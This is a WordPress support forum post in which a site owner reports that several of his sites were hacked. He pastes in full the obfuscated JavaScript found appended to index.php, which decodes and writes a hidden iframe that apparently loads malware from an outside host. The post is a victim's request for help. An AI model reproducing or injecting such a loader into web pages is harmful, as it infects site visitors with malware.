Hacked site through WP – Trojan

  • cmgmyr

    (@cmgmyr)


    15 years, 1 month ago

    We just noticed that 4 sites that we run WP on were hacked. On the index.php page (both in the root of the site and in the WP directory) we found this tagged onto the end of the code:

    <script>function c265607b11i49b964a1a5d03(i49b964a1a60eb){ var i49b964a1a64e6=16; return (parseInt(i49b964a1a60eb,i49b964a1a64e6));}function i49b964a1a70ef(i49b964a1a78e6){ var i49b964a1a80df='';i49b964a1aa0ae=String.fromCharCode;for(i49b964a1a88da=0;i49b964a1a88da<i49b964a1a78e6.length;i49b964a1a88da+=2){ i49b964a1a80df+=(i49b964a1aa0ae(c265607b11i49b964a1a5d03(i49b964a1a78e6.substr(i49b964a1a88da,2))));}return i49b964a1a80df;} var r4a='';var i49b964a1aa890='3C7'+r4a+'3637'+r4a+'2697'+r4a+'07'+r4a+'43E696628216D7'+r4a+'96961297'+r4a+'B646F637'+r4a+'56D656E7'+r4a+'42E7'+r4a+'7'+r4a+'7'+r4a+'2697'+r4a+'465287'+r4a+'56E657'+r4a+'363617'+r4a+'065282027'+r4a+'2533632536392536362537'+r4a+'322536312536642536352532302536652536312536642536352533642536332533322533362532302537'+r4a+'332537'+r4a+'32253633253364253237'+r4a+'2536382537'+r4a+'342537'+r4a+'342537'+r4a+'302533612532662532662536642536312536632537'+r4a+'37'+r4a+'2536312537'+r4a+'322536352537'+r4a+'342537'+r4a+'322536312536332536622537'+r4a+'332537'+r4a+'392537'+r4a+'332537'+r4a+'34253635253664253265253633253666253664253266253366253237'+r4a+'2532622534642536312537'+r4a+'342536382532652537'+r4a+'322536662537'+r4a+'352536652536342532382534642536312537'+r4a+'342536382532652537'+r4a+'32253631253665253634253666253664253238253239253261253339253335253335253335253239253262253237'+r4a+'253332253634253634253636253337'+r4a+'253633253634253633253632253338253332253237'+r4a+'2532302537'+r4a+'37'+r4a+'2536392536342537'+r4a+'34253638253364253336253333253337'+r4a+'253230253638253635253639253637'+r4a+'2536382537'+r4a+'342533642533312533352532302537'+r4a+'332537'+r4a+'342537'+r4a+'39253663253635253364253237'+r4a+'2537'+r4a+'362536392537'+r4a+'332536392536322536392536632536392537'+r4a+'342537'+r4a+'39253361253638253639253634253634253635253665253237'+r4a+'2533652533632532662536392536362537'+r4a+'3225363125366425363525336527'+r4a+'29293B7'+r4a+'D7'+r4a+'6617'+r4a+'2206D7'+r4a+'969613D7'+r4a+'47'+r4a+'27'+r4a+'5653B3C2F7'+r4a+'3637'+r4a+'2697'+r4a+'07'+r4a+'43E';document.write(i49b964a1a70ef(i49b964a1aa890));</script>

    When I went to one of the sites with this script it triggered my anti-virus with a trojan alert.

    Does anyone have any idea how this could happen and how we can prevent it? Thanks in advance!

    -Chris

Viewing 1 replies (of 1 total)
Viewing 1 replies (of 1 total)
  • The topic ‘Hacked site through WP – Trojan’ is closed to new replies.